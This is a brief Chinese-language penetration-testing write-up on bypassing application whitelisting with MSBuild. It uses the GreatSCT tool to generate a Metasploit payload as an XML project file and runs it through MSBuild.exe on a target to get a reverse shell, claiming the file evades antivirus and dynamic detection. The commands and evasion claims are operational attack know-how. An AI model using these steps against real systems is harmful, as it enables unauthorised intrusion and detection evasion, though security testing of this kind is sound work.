ApplicationWhiteListingBypassTest——MSBulid&CreatSCT

MSBuild是微軟提供的一個用於構建應用程序的平台，它以XML架構的項目文件來控制平台如何處理與生成軟體。

MSBuild還可以通過Task元素實現用戶自定義的任務進而載入惡意代碼，具體可看360威脅情報中心檢測發現到的一個案例海蓮花APT案例

測試時生成惡意XML文件可以藉助GreatSCT，這是一款生成應用白名單繞過的工具

安裝

git clone https://github.com/GreatSCT/GreatSCT.git

運行

python3 gr8sct.py

輸入help或者鍵入Enter進入選擇界面，將會有5種模式選擇(雖然有五種，但是我測試過後發現能正常運行正常上線並過殺軟的只有MSBuild的payload)

設置payload選項，並設置MSF的payload相關參數，generate生成一個payload

運行MSF並設置相關參數

靶機上運行命令 C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe shellcode.xml

成功反彈一個shell

經測試XML文件不會被殺軟檢測報毒，運行MSBuild進行上線操作也沒有觸發動態檢測